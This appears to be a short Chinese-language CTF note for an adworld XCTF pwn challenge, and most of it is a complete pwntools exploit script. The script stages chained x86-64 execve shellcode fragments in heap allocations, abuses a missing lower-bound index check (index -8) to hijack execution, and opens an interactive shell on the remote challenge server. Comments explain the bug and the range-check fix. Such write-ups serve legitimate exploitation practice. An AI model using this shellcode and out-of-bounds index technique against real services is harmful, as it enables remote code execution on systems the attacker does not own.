新接触的一道题,新题型。。
https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4611&page=1
Writeup: https://adworld.xctf.org.cn/media/uploads/writeup/ee65882803c511ea9f5700163e004e93.pdf
开眼23333。。。
# Exploit script for the adworld pwn task linked above (writeup PDF linked too).
# Flow: stage a short shellcode fragment in each of five heap allocations,
# free slot 0, re-create it at a negative index, then hand "/bin/sh" to the menu.
from pwn import *
from LibcSearcher import *  # NOTE: nothing from LibcSearcher is used in this script
context.log_level="debug"  # dumps every byte sent/received; handy when the remote stalls
context(arch="amd64",os="linux")  # asm() below assembles for x86-64


def create(p,index: int,size: int,content: bytes):
    """Menu option 1: allocate slot `index` with `size` bytes and fill it with `content`.

    `content` is sent with sendafter (no trailing newline) so the raw bytes land
    in the allocation exactly as given; the other fields are line-based.
    """
    p.sendlineafter("your choice>> ","1")
    p.sendlineafter("index:",str(index))
    p.sendlineafter("size:",str(size))
    p.sendafter("content:",content)


def delete(p,index: int):
    """Menu option 4: free slot `index`."""
    p.sendlineafter("your choice>> ","4")
    p.sendlineafter("index:",str(index))


p = remote("111.198.29.45",34191)  # challenge instance address as given on the task page
#p = process("./1")  # local binary, for testing without the remote

# Five shellcode fragments, each 7 bytes (within the 8 requested per slot).
# Together they set up execve: rax = 0x3b (execve on x86-64), rsi = 0, rdx = 0,
# then syscall.  Every fragment except the last ends in `eb 19`, a short jmp of
# +0x19 past its own end, so execution hops to the next fragment; that only
# works if consecutive allocations are exactly 0x20 bytes apart (presumably what
# the allocator hands out for size-8 requests) -- assumed here, never checked.
# rdi is never set by these fragments; presumably the target leaves it pointing
# at the most recent menu input, which is why "/bin/sh" is sent as a "choice"
# at the very end.  Confirm against the binary before relying on this.
ASM = []
ASM.append(asm("xor rax,rax") + b"\x90\x90\xeb\x19")
ASM.append(asm("mov eax,0x3b") + b"\xeb\x19")
ASM.append(asm("xor rsi,rsi") + b"\x90\x90\xeb\x19")
ASM.append(asm("xor rdx,rdx") + b"\x90\x90\xeb\x19")
ASM.append(asm("syscall") + b"\x90\x90\x90\x90\x90")

for i in range(0,5):
    create(p,i,8,ASM[i])

# The actual bug being used: re-creating at index -8 relies on the target not
# checking the lower bound of `index`, so the slot write lands before the slot
# array (see the writeup PDF for what is overwritten).  On the defending side a
# plain range check (0 <= index < slot count) on every menu path closes this.
delete(p,0)
create(p,-8,8,ASM[0])

p.sendlineafter("your choice>> ","/bin/sh")
p.interactive()
附上i64db:
1f10c9df3d784b5ba04b205c1610a11e